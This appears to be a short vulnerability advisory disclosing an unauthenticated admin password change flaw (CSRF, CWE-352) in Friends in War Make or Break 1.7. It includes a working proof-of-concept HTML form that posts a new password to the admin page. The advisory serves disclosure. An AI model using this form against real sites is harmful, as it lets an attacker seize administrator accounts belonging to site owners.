Friends in War Make or Break 1.7 Cross-Site Request Forgery

2017.07.28
Credit: shinnai
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Friends in War Make or Break 1.7 - Unauthenticated admin password change Url: http://software.friendsinwar.com/ http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9 Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.altervista.org/ --------------------------------------------------------------------- PROOF OF CONCEPT: <form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1"> <label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label> <input type="text" name="password" value="ChangeMe"> <input type="text" name="submit" value="Edit+Password" hidden=true> <input type="submit" value="Submit"> </form>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top